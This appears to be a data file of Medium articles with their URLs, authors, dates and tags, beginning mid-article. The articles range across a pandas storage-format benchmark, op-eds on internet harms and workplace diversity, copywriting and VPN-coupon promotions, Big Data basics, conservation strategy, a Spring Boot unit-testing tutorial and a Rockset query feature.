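The embedded snippet isn’t reproduced here, but a minimal stand-in with the same shape — numerical plus categorical string columns, defaulting to the benchmark’s 15/15 split — might look like this (the column names and value choices are assumptions of mine):

```python
import numpy as np
import pandas as pd


def generate_dataset(n_rows, num_count=15, cat_count=15, cat_size=10):
    """Return a frame with `num_count` numeric columns and `cat_count`
    categorical string columns, mirroring the benchmark's 15/15 split."""
    rng = np.random.RandomState(0)
    labels = ["value_%d" % i for i in range(cat_size)]
    dataset = {"n%d" % i: rng.normal(size=n_rows) for i in range(num_count)}
    dataset.update(
        {"c%d" % i: rng.choice(labels, size=n_rows) for i in range(cat_count)}
    )
    return pd.DataFrame(dataset)


df = generate_dataset(1000)
print(df.shape)  # (1000, 30)
```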
The performance of CSV file saving and loading serves as a baseline. The five randomly generated datasets with a million observations were dumped into CSV and read back into memory to get mean metrics. Each binary format was tested against 20 randomly generated datasets with the same number of rows. The datasets consist of 15 numerical and 15 categorical features. You can find the full source code with the benchmarking function in this repository.
(a) Categorical Features as Strings
The following picture shows averaged I/O times for each data format. An interesting observation here is that hdf shows even slower loading speed than the csv one while other binary formats perform noticeably better. The two most impressive are feather and parquet .
What about memory overhead while saving the data and reading it from a disk? The next picture shows us that hdf is again performing not that good. And sure enough, the csv doesn’t require too much additional memory to save/load plain text strings while feather and parquet go pretty close to each other.
Finally, let’s look at the file sizes. This time parquet shows an impressive result which is not surprising taking into account that this format was developed to store large volumes of data efficiently.
(b) Categorical Features Converted
In the previous section, we didn’t make any attempt to store our categorical features efficiently, using plain strings instead. Let’s fix this omission! This time we use a dedicated pandas.Categorical type instead of plain strings.
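The conversion itself is a one-liner, and the memory effect is easy to see on a toy column (exact sizes will vary, but the direction of the saving is reliable):

```python
import pandas as pd

df = pd.DataFrame({"color": ["red", "green", "red", "blue"] * 250})

# As plain strings, every cell holds its own Python object.
object_bytes = df["color"].memory_usage(deep=True)

# As a categorical, each distinct label is stored once plus small integer codes.
df["color"] = df["color"].astype("category")
cat_bytes = df["color"].memory_usage(deep=True)

print(cat_bytes < object_bytes)  # True -- usually a large saving
```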
See how it looks now compared to the plain text csv ! Now all binary formats show their real power. The baseline is far behind so let’s remove it to see the differences between various binary formats more clearly.
The feather and pickle show the best I/O speed while hdf still shows noticeable overhead.
Now it is time to compare memory consumption during data process loading. The following bar diagram shows an important fact about parquet format we’ve mentioned before.
Although it takes up little space on the disk, it requires an extra amount of resources to decompress the data back into a data frame. It is possible that you won’t be able to load the file into memory even if it requires only a moderate volume on the persistent storage disk.
The final plot shows file sizes for the formats. All the formats show good results, except hdf that still requires much more space than others.
Conclusion
As our little test shows, it seems that the feather format is an ideal candidate to store the data between Jupyter sessions. It shows high I/O speed, doesn’t take too much space on the disk and doesn’t need any unpacking when loaded back into RAM.
The Baby, The Bathwater and The Backlash | It’s been a long time coming. But not all that long. After 30 years of exploration, we find ourselves at war with the Internet we created.
Vices often begin as prescriptions for what ails us. It took about 100 years to first popularize and then condemn cigarette smoking. Before the 1800s you could use cocaine and opioids quite freely to relieve symptoms of everything from diarrhea to toothache. Gun use is still debated despite the toll they’ve taken on human life. And we are just beginning the great cannabis experiment as entire cities are ingesting and inhaling altered states.
So it shouldn’t come as much of a surprise that thirty years after its invention as mankind’s savior and the repository of all human knowledge, the Internet has been declared a toxic dump. Cleanup solutions span everything from abdicating to the tech titans to work things out to serious regulation. Already some early trendsetters are declaring themselves social media free and are limiting their online life with evangelistic fervor.
The mature Internet makes it child’s play to damage a person’s life through bullying, manipulative practices, hate messages and misinformation, just to rattle off a few.
But walking away from the Internet would be like walking away from the invention of fire — an invention that’s served all of us well, and caused peril for some unfortunate others.
As we start building the next gen Internet, one that will be made of experiences based on 5G, AI and connected ubiquity, we have a chance to repair the potholes. Time to wise up and treat the Internet as the WWT (World Wide Treasure) it was meant to be. Think of it like the UNESCO for cyberspace — protect a heritage site but plan for future growth.
In the spirit of Swiftian Modest Proposals let me suggest a few things to avoid throwing the baby out with the bathwater:
An Internet Drivers License Program
It’s as dangerous as a car so why not issue a license to drive it? I’ve been suggesting the notion of an Internet driver’s license since the early 90s. My suggestion then was as a way to prepare young digital citizens for the lives they would lead. Too late. Now those young citizens are young adults with very little, if any, Internet training other than the school of hard knocks. Time for us all to get driver’s licenses and at minimum be able to drive defensively on the information highway. If you’re walking around with a device in your pocket that has more computing power than the first gen NASA spacecraft shouldn’t you get a modicum of training? A simple basic digital literacy test on how to distinguish fact from fiction, extricate yourself from nasty situations, trace origins of messages, etc. goes a long way. Plus, you should need to renew it every few years based on new technologies and new evils.
Require Registration and Proof Of Identity
We’re way past the “nobody knows you’re a dog” era. It’s time to woof up and identify yourself. End to end anonymity has not been kind to the Internet so let’s reinvent beginning with the notion that there is an owner behind an IP address. Total anonymity is not a tenet of modern life; the Internet is a part of modern life. Figure out the corollary. ICANN the body that manages addressable names on the Internet needs a serious makeover.
Ask Permission Once, Twice and Then Again
Have you noticed that many of your destination websites are now reminding you how you got there and what their business is? Three claps for them. The post-GDPR world is realizing that you shouldn’t have to read until page 63 of the terms and conditions to find out what type of information is being extracted.
School Detention for Bullies and Thieves
Schools needs to be a place where good habits are formed. A teacher shouldn’t have to compete for attention with YouTube. The price to pay for plagiarizing, bullying, spreading false rumors should be explicitly clear. A connection-free detention is something no kid wants. So let’s get on it.
The How Did I Get Here Button
You should be able to click a button and have it show you the circuitous route you took to wind up where you are on the web. They know how you got there, and so should you.
Yes, There are Innocent Victims but Not Always
We’ve been culturally complicit in making the Internet a cesspool. Too happy to click for free, too rushed to figure out why something seems off. Catch yourself in the act.
Are you following a torrid headline? Fueling the fires of a hurtful conversation? Too lazy to hit “block”. Yes, we are, by nature, voyeuristic, filled with guilty pleasures and all too happy to blame someone else. A little self-blaming/shaming can go a long way.
Silver bullet solutions to what ails the Internet are nonexistent. But cleaning up the messier parts of online life is not beyond our talents. | https://medium.com/@robin.raskin/the-baby-the-bathwater-and-the-backlash-5b417a3ef3eb | ['Robin Raskin'] | 2019-03-19 15:31:08.908000+00:00 | ['Internet', 'Misinformation', 'Privacy', 'Online Safety', 'Bullying'] |
How to Write Killer Copy for Your Business | Photo by Glenn Carstens-Peters on Unsplash
As a business owner, you’ve got a lot to juggle. Taking care of customers, bookkeeping, and evaluating the market is more than enough to keep you stressed. But is it all doable? Totally.
Revamping the copy on that outdated, desperately-in-need-of-a-makeover website, on the other hand? OVERWHELMING.
Every word you write for your business is an opportunity to get new leads and convert casual browsers to buyers. So, if those words aren’t chosen carefully, you’re going to miss out on A LOT of opportunities (read: you’re going to lose a lot of money!)
It doesn’t matter how awesome your product or service is. If your copy isn’t snappy and persuasive, if it doesn’t connect with your readers and inspire them to buy…they’ll hit the back button, toss your brochure, or change the channel faster than you can say, “money-back guarantee.”
So, use these copywriting 101 tips when writing all of your marketing materials. If you follow these guidelines, you’ll be converting casual readers to raving fans — and paying customers — in no time.
1. Decide how you want them to feel. Humans don’t buy strictly based on need. We buy what we WANT. Because of how it makes us FEEL. So, effective copy connects with consumers on an emotional level. Do you want to inspire them with the opportunities your service makes possible? Or unsettle them into buying your product for the sake of their health and safety? Identify how you want your readers to feel and write with that in mind. Bonus tip: brainstorm “power words” that evoke the emotion you want your customers to feel and sprinkle them in your copy.
2. Utilize the power of “you.” Sorry to break it to you but no one cares about your company. They care about themselves; they care about what your company can do for them. So, stop talking about yourself and your accomplishments. Address your customers directly. And tell them what’s in it for them to buy from you. Better yet, SHOW them. Focus on benefits over features and show them what their lives will be like with your product or service in it.
3. Write the way you speak. If your copy reads like a scientific paper or textbook, it’s either going to turn your readers off immediately or go right over their heads. Great copy has a casual tone and uses short, easy-to-understand words. It’s your salesperson on paper (or computer screen.) So make it sound like a human being.
4. Be concise. We’re being flooded with so much information on a daily basis, our attention spans are getting shorter and shorter. According to Oracle.com, studies show the average human attention span dropped from 12 seconds to just 8 seconds between the years 2000 and 2015. So get to the point, fast. Great stories are engaging but try to say more with less.
5. When all else fails, hire a professional copywriter. OK — obviously, this isn’t a tip for writing your own copy. But it bears including in this list. Because, sometimes, writing is just not your thing. And that’s ok! Writing persuasive copy takes time, hard work, and loads of practice. So, if you don’t have the time or energy to invest, outsource your project to a pro. Look for a certified copywriter with an eye for detail and an obsession with proper grammar.
In Conclusion
Writing killer copy for your business is not an easy task. If you follow these guidelines, you’ll be one step ahead of your competitors. But, if you’re short on time or just don’t have the inspiration, let me do the heavy lifting for you.
You deserve to be raking in the cash — not wracking your brain over how to grow your business. No more worrying about turning your features into benefits, using proper grammar, or sounding too sales-y. And no more burning the late-night oil, trying to complete yet another task.
I’m a certified copywriter who’s studied with Tamsin Henderson, one of the best copywriting teachers on this side of the equator. And I use a tested, tried-and-true approach that inspires your readers and makes your business sparkle. Visit copybycarrie.com for details today! | https://medium.com/@carriefsolomon/how-to-write-copy-for-your-business-83f41e33f85d | ['Carrie Solomon'] | 2021-01-19 20:47:01.175000+00:00 | ['Copywriting Services', 'Small Business Owner', 'Business Writing Skills', 'Copywriting', 'Copywriting Tips'] |
Josh Cahill Presents Coupon For Surfshark VPN | Josh Cahill is a travel expert and always looking for adventures. Also he is a huge fan of airplanes. On his Youtube channel you can find all sorts of airline reviews, inspiration for travel destinations and places to visit there.
Recently Josh partnered up with Surfshark VPN, which is a useful tool to have while traveling, both for security purposes and for bypassing all sorts of geographical restrictions worldwide. Josh also presented an 82% coupon code for the 2-year plan of Surfshark (and you also get 1 month for free). This is a guide on how to get it.
How to get Josh Cahill VPN coupon code
Go to Surfshark website here
Insert the coupon code cahill
Or follow this link: https://surfshark.com/deals?coupon=cahill
Sign up with your email and continue the purchase
With this coupon code you will get an 82% discount on the 2-year plan of Surfshark + 1 month for free. This will cost you $2.39 per month.
Surfshark coupon
Why Surfshark
The most important feature to look for in a VPN is how it manages to keep its customers anonymous online. Surfshark does this by following a strict no-logs policy and avoiding data-collection laws, since it is based in a privacy-friendly location. It also offers such advanced features as a built-in kill switch, GPS spoofing, DNS and IP leak protection, and P2P servers for anonymous torrenting. It also uses industry-leading encryption and offers fast servers worldwide.
Surfshark stands out from other VPNs by supporting an unlimited number of devices, while other VPNs usually support up to 7 devices per account. So you will be able to share one account with your family or friends. Surfshark is also liked by people who use a VPN for streaming and for bypassing geographical restrictions. This VPN works well with major streaming platforms like Netflix, and it manages to bypass firewalls and any kind of restriction online.
Lastly, Surfshark offers a built-in ad-blocker, 24/7 customer support and a 30-day money-back guarantee.
Get Surfshark with 82% discount here
Watch Josh Cahill Youtube channel here | https://medium.com/@entrentert/josh-cahill-presents-coupon-for-surfshark-vpn-bb4116dfaeec | ['Trevor E.'] | 2020-09-11 08:29:23.634000+00:00 | ['Discount', 'Promotion', 'Coupon', 'VPN', 'Deal'] |
Cryptocurrency — The SEC’s Position — Part 2 of 5 | Video posted: Dec. 3, 2018
Darin Mangum
Cryptocurrency - The SEC’s Position, Video Part 2 of 5. In this video I discuss how the Securities and Exchange Commission looks at cryptocurrency investment offerings or any blockchain investment. It is important to know where the SEC stands and how to be compliant with their position in order to stay free of unwanted investigations and possible fraud charges if your Private Placement Memorandum is not in order.
As a Private Placement Memorandum Attorney, I specialize in keeping your blockchain ICO / offering free from scrutiny by the SEC and other regulatory bodies.
I offer a no-cost, no-obligation consultation about your PPM offering / business venture. Thanks for watching and subscribing! :-)
Phone: (281) 203–0194
E-mail: darin@theppmattorney.com
Website: www.ThePPMAttorney.com
FOR GENERAL INFORMATION ONLY. NOT TO BE CONSTRUED AS LEGAL ADVICE. I’M NOT YOUR ATTORNEY UNLESS A DULY EXECUTED ENGAGEMENT LETTER EXISTS BETWEEN US. © 2018 DARIN H. MANGUM PLLC. | https://medium.com/@darinmangumlaw/cryptocurrency-the-secs-position-part-2-of-5-1bec13605dbd | ['Darin Mangum'] | 2021-06-08 14:51:33.062000+00:00 | ['Compliance', 'Initial Coin Offering', 'ICO', 'Blockchain', 'Cryptocurrency'] |
Big Data 3 V’s and 5 V’s | Recently, we study the definition and concept of big data. Now, question is “How to identify Big Data?” To explore answer for this question refer following paragraphs.
The characteristics of Big Data are categorized in various V’s concepts. The main types are the 3 V’s and 5 V’s, which demonstrate the pillars of Big Data in brief. In order to qualify as big data, data must exhibit the following characteristics. This is a very efficient way to understand what Big Data actually is and how to identify it.
“Big data stands mainly on 5 pillars: Volume, Velocity, Variety, Veracity and Value. These pillars are briefly described in the 3 V’s and 5 V’s architectures.”
Photo by rawpixel from Burst
The following paragraphs demonstrate the 3 V’s and 5 V’s:
3 V’s:
3 V’s contains the 3 main characteristics of Big Data: Volume, Velocity and Variety. Each keyword is self-explanatory. Each characteristic demonstrates separate physical as well as logical attributes.
Edited/Created by Author
1) Volume:
i. In big data, Volume refers to the huge amount of data involved.
ii. The volume describes a huge set of data which is very complex to process further for extracting valuable information from it.
iii. Volume does not prescribe an exact size for data to count as big data; it only has to be relatively big. The size could be in Terabytes, Exabytes or even Zettabytes.
iv. The sheer size of big data makes it perplexing to process.
Photo by Markus Spiske on Unsplash
Data Measurement Rows:
1. Bit: an eighth of a byte
2. Byte: 1 byte
3. Kilobyte: 1 thousand, or 1,000 bytes
4. Megabyte: 1 million, or 1,000,000 bytes
5. Gigabyte: 1 billion, or 1,000,000,000 bytes
6. Terabyte: 1 trillion, or 1,000,000,000,000 bytes
7. Petabyte: 1 quadrillion, or 1,000,000,000,000,000 bytes
8. Exabyte: 1 quintillion, or 1,000,000,000,000,000,000 bytes
9. Zettabyte: 1 sextillion, or 1,000,000,000,000,000,000,000 bytes
10. Yottabyte: 1 septillion, or 1,000,000,000,000,000,000,000,000 bytes
For Example: The world generates 2.5 quintillion bytes of data per day.
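For illustration, the decimal ladder above can be wrapped in a small conversion helper (powers of 1,000 are assumed here, matching the list):

```python
UNITS = ["bytes", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB"]


def humanize(n_bytes):
    """Render a byte count using the decimal (powers of 1,000) ladder."""
    value, unit = float(n_bytes), UNITS[0]
    for next_unit in UNITS[1:]:
        if value < 1000:
            break
        value /= 1000.0
        unit = next_unit
    return "%.1f %s" % (value, unit)


# The article's example: 2.5 quintillion bytes generated per day.
print(humanize(2_500_000_000_000_000_000))  # 2.5 EB
```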
2) Velocity:
i. In big data, Velocity demonstrates two things mainly: (1) the speed of growth of data and (2) the speed of transmission of data.
ii. Velocity refers to data being generated, increased and shared at a particular speed through various resources.
Edited/Created by Author
iii. Speed of growth of data: The data increases day by day through various resources. Some of the resources are explained below.
Internet Of Things (IOT): IOT is prominent for contributing to big data. It generates data through IOT devices placed in automated vehicles, digital IOT bulbs, IOT-based robots etc.
Social Media: As you can see, users on social media are increasing day by day, so they are generating huge batches of data. There are many other such resources which generate data at high speed.
iv. Speed of transmission of data: Speed also plays a major role in identifying big data. Big data grows rapidly, which makes it very complex to process quickly and difficult to transmit through fiber-optic or electromagnetic means of transmission. Therefore this term is very important for demonstrating velocity.
For Example: Twitter generates 500 Million tweets per day; both the rate of generation of data and the rate of transmission of data are very high.
3) Variety:
i. In big data, Variety is nothing but different types of data.
ii. This term covers various types of data such as texts, audios, videos, XML files, data in rows and columns etc.
iii. Each type of data has a separate way of being processed; therefore, it is necessary to categorize the different types of data.
iv. In Big Data, data is categorized into mainly three types as follows,
Edited/Created by Author
a. Structured Data: Data that is in the format of a relational database and is properly organized into rows and columns is known as structured data. b. Unstructured Data: Data that includes various formats such as audio, video, XML files, Word files, etc., and is not organized in a proper format, is said to be unstructured data. c. Semi-structured Data: As the name suggests, this is data that is neither fully structured nor fully unstructured; it is partially structured and mixed with data in an unstructured format. For example: social media contains photos, videos, and text from people in huge volumes. This data is big data, and it can be structured, unstructured, or semi-structured.
The concept of the 3 V’s explains the basic architecture of big data, but the 5 V’s fulfill some additional requirements to demonstrate it more completely. The following paragraphs explain the architecture of the 5 V’s concept. | https://medium.com/analytics-vidhya/big-data-3-vs-and-5-v-s-c1cae2a6d311 | ['Shubham Rajput'] | 2020-07-02 05:42:09.138000+00:00 | ['Technology', 'Data Science', 'Future', 'Big Data', 'Big Data Analytics'] |
Strategy Development for the Budding Wildlife Conservationist | Principles Stand Out
The extensive amount of content to be covered could have easily been made overwhelming and disconnected were an anchor absent. Said anchor was found in the six guiding Principles, intended to guide overall strategy development and consistently remind participants what is and is not vitally important to achieving appropriate objectives and project outcomes. They are as follows:
1. Keep It Wild
Monarch butterflies migrate in Fall and Winter and aggregate at night to retain warmth. It’s a good *strategy* to ensure survival! || Photo by Alex Guillaume on Unsplash
In essence, the priority of a project should always be conservation impact, defined as
“measured positive change in biodiversity target results, threat results, behavior results, and contributing factor results”
These impacts could be:
an improved status of a population e.g. migratory western monarch butterflies (biodiversity target result)
a reduction in harmful direct threats e.g. habitat loss (threat result)
a reduction in behaviors driving threats e.g. replacing native monarch-friendly plant species with non-native ornamental species by community gardeners (behavior result)
a change in what is behind the behaviors driving the threats e.g. improved education about native plant species of community gardeners (contributing factor result)
2. Look Up
An organization’s collective impact of connected conservation strategies is the goal (instead of the collective impacts of unconnected strategies) — when all strategies work together, the impact reaches further!
This principle was easiest for me to grasp when I thought of it in terms of nested strategies. For example, the strategy for improving monarch populations (finest-scope) could be nested within the strategy for improving California butterfly populations (medium-scope), which could be nested within the strategy for improving lepidopteran (butterflies and moths) populations west of the Rockies (largest-scope). It all just fits (nests) so nicely!
3. Listen to the People
The people carrying out behaviors that negatively impact biodiversity need to be part of the conversation in order for their behaviors to be fully understood and to come up with solutions they will participate in. Nowadays, the direct and indirect threats to biodiversity tend to be caused by people and their activities — think deforestation, poaching, and invasive species. Gone are the days where the most influential factors were volcanoes, meteorites, and ice ages.
4. Do No Harm
Seemingly simple, but certainly not easy, this principle aims to minimize any negative impacts on both people and wildlife that conservation efforts may incur. For example, perhaps habitat restoration to conserve an endangered Species A degrades habitat that is important for an endangered Species B… harm! Or, also in this scenario, the livelihood of the local community is negatively impacted because the land being restored was being used to grow lucrative crops… harm!
5. Think Big
Given a specific timeframe, conservationists should strive to maximize conservation impact through their strategies. Nobody has time for the easy-pickings of low-hanging fruit! Reach higher and harder to get the juiciest reward.
6. Look Forward
The world, the climate, and local conditions are constantly changing… and an effective strategy anticipates these changes and accounts for them to the best of its ability — as WildTeam puts it, strategies should be “future-proof”. It doesn’t do a biodiversity target any good if political, technological, or stakeholder changes can stop the achievement of conservation impact. | https://medium.com/@nataliemrhoades/strategy-development-for-the-budding-wildlife-conservationist-550422643939 | ['Natalie Rhoades'] | 2020-12-22 03:46:56.799000+00:00 | ['Skills Development', 'Project Management', 'Strategy', 'Planning', 'Conservation'] |
Coming soon: a new design! We will very soon be deploying… | Inbound Marketing Manager @ Wooclap, interested in and excited about applying EdTech to the educational needs of today’s students
| https://medium.com/wooclapfr/%C3%A0-venir-un-nouveau-design-72eefd1e21e7 | ['Gauthier Lebbe'] | 2019-03-18 07:51:27.527000+00:00 | ['Ecole', 'News', 'Innovation', 'Education', 'Presentations'] |
Even Leaders in Diversity, Equity and Inclusion Sometimes Get It Wrong | Aysha H. Khoury, M.D., was suspended from her role in August as an educator and clinician at Kaiser Permanente Bernard J. Tyson School of Medicine, an organization that was built on the principles of health equity. The school asked Khoury to teach a course about racism and maternal health, but abruptly ended it and suspended her without warning this summer. Although an investigation into her dismissal found no fault with Khoury, Kaiser only reinstated her as a clinician, a move that is profitable for the school. She is still barred as an educator there and has yet to get a reason why.
Aysha H. Khoury, M.D.
I can only assume that this has something to do with President Trump’s recently introduced penalties for contractors who offer diversity training. Any organization that receives federal funds while violating the order — i.e., teaching diversity and inclusion — can be blacklisted from government contracts (e.g., Medicare and Medicaid payments or grant funding), among other punishments. Perhaps Kaiser panicked after learning of the ruling and suspended Khoury out of an abundance of caution and to avoid the risk of being penalized as a result of the executive order?
I wish I could say I’m surprised, but too often, BIPOC people’s careers become collateral damage in organizations who fumble diversity initiatives. Companies tend to retaliate against the very people they have recruited, in both subtle and dramatic ways. The organizations that waited until this year to implement diversity, equity and inclusion training have often burdened their Black employees with leading diversity reviews, even if they are not prepared or skilled to take on this extra work. And people of color who are hired in mostly white organizations often experience racialized tensions that lead to them being pushed out of their workplaces or quitting to find more supportive work environments.
I’ve experienced it personally.
Trump’s executive order is spiteful, abhorrent and scary, and the president-elect should overturn it as soon as he can. That said, it does not excuse Kaiser from negating its diversity, equity and inclusion efforts and throwing a Black female physician under the bus in the interest of complying. It is this very type of action that perpetuates systemic racism, and no amount of politically correct tweeting after the fact will rectify the situation.
Ending racism is not a comfortable process. It requires work, even if that work is painful.
If you are a healthcare leader struggling with a similar situation, consider contracting with an objective, external mediator before pressing pause on a vital program or dismissing a key hire who is working to dismantle racism and prevent disparities. An impartial third-party administrator can provide objective feedback to reach a point of resolution. At the same time, your human resources and media relations departments should protect your organization while properly balancing the need to support employees and manage risks from external threats.
It has become very trendy this year for healthcare organizations to talk about the importance of diversity, equity, inclusion and anti-racism education, without actually living up to those messages. Moving forward, I hope the school immediately reinstates Dr. Khoury’s position and takes steps to prevent any similar missteps.
Please consider signing this petition to reinstate Khoury. | https://medium.com/just-health-collective/even-leaders-in-diversity-equity-and-inclusion-sometimes-get-it-wrong-f950237aee6f | ['Duane Reynolds'] | 2020-12-22 17:42:36.322000+00:00 | ['Healthcare', 'Diversity And Inclusion', 'Racism', 'Diversity', 'Health Equity'] |
The devil that is @SpringBootTest! | I’ve seen a lot of developers claiming that one of the “cool features” of Spring is that it simplifies your unit tests by introducing @SpringBootTest. That’s just not true, and I don’t think it was Spring’s intention either! Let’s first get into what a “Unit Test” is and what is “Not a Unit Test”. I don’t want to be a Word Nazi here, but I have seen this misunderstanding lead to @SpringBootTest being used on every unit test, and no one wants that!
To explain the problem, let’s take a step back and see how we [should] test our applications. We have two completely different types of tests at the two ends of a stick. On one end we have “End-To-End Integration Tests”, where [hopefully] nothing is mocked and our application is tested as close as possible to the way it runs in production. If these tests pass, we can say our application is ready! On the other end of the stick, we have “Unit Tests”, where one unit of work is tested and everything other than that unit of work is mocked during the test. QAs want to test everything exactly the same way as it is in production (as they should!). But that comes with a cost! Tests will be heavy. Now, we developers want a “quicker result” on whether we broke anything with the change we just made. So we start “assuming”. We remove some of the elements of an Integration Test and replace them with something we control. This way we have more control over the test, and it will be faster too. The more we assume, the more control we have and the faster our tests become. This continues until we reach Unit Tests, where we control everything! Basically we say “assuming this request comes in and the DB does that, etc., I expect these things to happen”.
For example, let’s say I am implementing a “Register User” service method. I will try to make this a bit more real-world to emphasize how DDD has eased our life here too!
The business expert says that when registering a user, I should make sure the user doesn’t already exist in our DB, then generate an activation link for this user and email the generated activation link to him/her.
Now using DDD, I will translate this to:
I should make sure that the user doesn’t already exist in our User Store, then generate an activation code for this user and send the generated activation code to him/her.
package ir.amv.snippets.unittestdemo;

import java.util.UUID;

import lombok.RequiredArgsConstructor;

/**
 * @author Amir
 */
@RequiredArgsConstructor
public class UserService {

    private final UserRepository userRepository;
    private final ActivationCodeSender activationCodeSender;

    public void registerUser(String email) {
        userRepository.findByEmail(email)
                .ifPresent(user -> {
                    throw new IllegalArgumentException(String.format("User %s already exists", email));
                });
        String activationCode = UUID.randomUUID().toString();
        activationCodeSender.send(email, activationCode);
        userRepository.saveUser(email, activationCode);
    }
}
Now, in production, the User Store will be our DB (easily replaceable by an Active Directory User Store, thanks to DDD), and sending the activation code will be done by emailing an activation link to the user. This is what happens in Integration Tests. In my Unit Tests, however, I can “assume” that the User Store will, for example, say this user doesn’t already exist, and then expect a generated code to be passed to the sender. I don’t need Spring here. Actually, everything other than my UserService should be mocked.
Mockito has some useful annotations for this. Let’s build our unit test step by step. First we create the test class. You should read this as “create mock objects for UserRepository and ActivationCodeSender, then create an instance of UserService by calling its biggest constructor and passing in the mocked objects”.
package ir.amv.snippets.unittestdemo;

import static org.junit.jupiter.api.Assertions.*;
import static org.mockito.Mockito.*;

import org.junit.jupiter.api.Nested;
import org.junit.jupiter.api.Test;
import org.junit.jupiter.api.extension.ExtendWith;
import org.mockito.InjectMocks;
import org.mockito.Mock;
import org.mockito.junit.jupiter.MockitoExtension;

@ExtendWith(MockitoExtension.class)
class UserServiceTest {

    @Mock
    private UserRepository userRepository;

    @Mock
    private ActivationCodeSender activationCodeSender;

    @InjectMocks
    private UserService underTest;
}
Now I want to create unit tests for my register method. I will create a @Nested class for the tests related to this method, because our business case has two different scenarios: an existing user and a non-existing user.
class UserServiceTest { // fields not shown

    @Nested
    class registerUser {

        @Test
        void givenExistingUser() {
            // given
            // when
            // then
        }

        @Test
        void givenNoneExistingUser() {
            // given
            // when
            // then
        }
    }
}
The first case is easy. If the user already exists, I should get an IllegalArgumentException:
@Test
void givenExistingUser() {
    // given
    String email = "doesn't really need to be an email because we CONTROL everything!";
    when(userRepository.findByEmail(eq(email))).thenReturn(Optional.of(mock(User.class)));

    // when & then
    assertThrows(IllegalArgumentException.class,
            () -> underTest.registerUser(email));
}
And for a non-existing user:
@Test
void givenNoneExistingUser() {
    // given
    String email = "doesn't really need to be an email because we CONTROL everything!";
    when(userRepository.findByEmail(eq(email))).thenReturn(Optional.empty());

    // when
    underTest.registerUser(email);

    // then
    verify(userRepository).saveUser(eq(email), anyString());
    verify(activationCodeSender).send(eq(email), anyString());
}
And that’s it. If you like and agree with this way of implementing unit tests and are using IntelliJ IDEA, you can use this setup as your default JUnit 5 test class template, which will come in handy when you Alt+Enter on a class and select “Create Test”. | https://medium.com/swlh/the-devil-that-is-springboottest-68b7f4148bb6 | ['Amir Mohammad Vosough'] | 2020-05-03 23:01:38.966000+00:00 | ['Unit Testing', 'Junit 5', 'Spring Boot', 'Integration Testing'] |
Bittersweet | That’s exactly what Venezuela have become.
You go for the full roller coaster experience, in a matter of seconds you can go from being incredibly happy after spending some time with amazing people you just meet, to completely broken-hearted after running into an old friend who’s struggling due to the serious economic crisis in the country.
From enjoying delicious food with the family, feeling “full” and paying the bill taking advantage of a favourable exchange rate, to realising there’s people that can barely eat once a day, because of that same exchange rate.
From the desire to go to the beach or take your family somewhere nice, to just avoid both due to the severe insecurity.
From enjoying every second with the people you love, to remembering I will leave and they will stay there.
It is bittersweet for a guy like me, who luckily have the chance to get out.
For those that have to stay, there’s nothing sweet. It’s all bitter. | https://medium.com/thoughts-on-the-go-journal/bittersweet-7be137496251 | ['Joseph Emmi'] | 2016-08-15 21:35:55.821000+00:00 | ['Life', 'Personal', 'Venezuela', 'Journal'] |
Query Lambdas: Increasing Developer Velocity for Application Development | At Rockset we strive to make building modern data applications easy and intuitive. Data-backed applications come with an inherent amount of complexity — managing the database backend, exposing a data API (often using hard-coded SQL or an ORM to write queries), keeping the data and application code in sync… the list goes on. Just as Rockset has reimagined and dramatically simplified the traditional ETL pipeline on the data-loading side, we’re now proud to release a new product feature — Query Lambdas — that similarly rethinks the data application development workflow.
Application Development on Rockset: Status Quo
The traditional application development workflow on Rockset has looked something like the following:
Step 1: Construct SQL query in the Rockset Console
For this case, let’s use the sample query:
-- select events for a particular user in the last 5 days
SELECT
    event, event_time
FROM
    "User-Activity"
WHERE
    userId = '...@rockset.com'
    AND event_time > CURRENT_TIMESTAMP() - DAYS(5)
Step 2: Substitute out hard-coded values or add filters manually using Query Parameters
Let’s say we want to generalize this query to support arbitrary user emails and time durations. The query SQL would look something like this:
-- select events for any particular user in the last X days
SELECT
event, event_time
FROM
"User-Activity"
WHERE
userId = :userId
AND event_time > CURRENT_TIMESTAMP() - DAYS(:days)
Step 3: Hardcode raw SQL into your application code along with parameter values
For a Node.js app using our Javascript client, this code would look something like:
client.queries
.query({
sql: {
query: `SELECT
event, event_time
FROM
"User-Activity"
WHERE
userId = :userId
AND event_time > CURRENT_TIMESTAMP() - DAYS(:days)`,
},
parameters: [
{
name: 'userId',
type: 'string',
value: '...',
},
{
name: 'days',
type: 'int',
value: '5',
},
],
})
.then(console.log);
While this simple workflow works well for small applications and POCs, it does not accommodate the more complex software development workflows involved in building production applications. Production applications have stringent performance monitoring and reliability requirements. Making any changes to a live application, or to the database that serves that application, must be handled with the utmost care. Production applications also have stringent security requirements and should prevent vulnerabilities like SQL injection at all costs. Some of the drawbacks of the above workflow include:
Raw SQL in application code: Embedding raw SQL in application code can be difficult — often special escaping is required for certain characters in the SQL. It can even be dangerous, as a developer may not realize the hazards of using string interpolation to customize their query to specific users / use-cases as opposed to Query Parameters and thus create a serious vulnerability.
Embedding raw SQL in application code can be difficult — often special escaping is required for certain characters in the SQL. It can even be dangerous, as a developer may not realize the hazards of using string interpolation to customize their query to specific users / use-cases as opposed to Query Parameters and thus create a serious vulnerability. Managing the SQL development / application development lifecycle: Simple queries are easy to build and manage. But as queries get more complex, expertise is usually split between a data team and an application development team. In this existing workflow, it is hard for these two teams to collaborate safely on Rockset — for example, a database administrator might not realize that a collection is actively being queried by an application and delete it. Likewise, a developer may tweak the SQL (for example, selecting an additional field or adding an ORDER BY clause) to better fit the needs of the application and create a 10–100x slowdown without realizing it.
Simple queries are easy to build and manage. But as queries get more complex, expertise is usually split between a data team and an application development team. In this existing workflow, it is hard for these two teams to collaborate safely on Rockset — for example, a database administrator might not realize that a collection is actively being queried by an application and delete it. Likewise, a developer may tweak the SQL (for example, selecting an additional field or adding an ORDER BY clause) to better fit the needs of the application and create a 10–100x slowdown without realizing it. Query iteration in application code: Can be tedious — to take advantage of the bells and whistles of our SQL Editor, you have to take the SQL out of the application code, unescape / fill parameters as needed, put it into the SQL editor, iterate, reverse the process to get back into your application and try again. As someone who has built several applications and dashboards backed by Rockset, I know how painful this can be :D
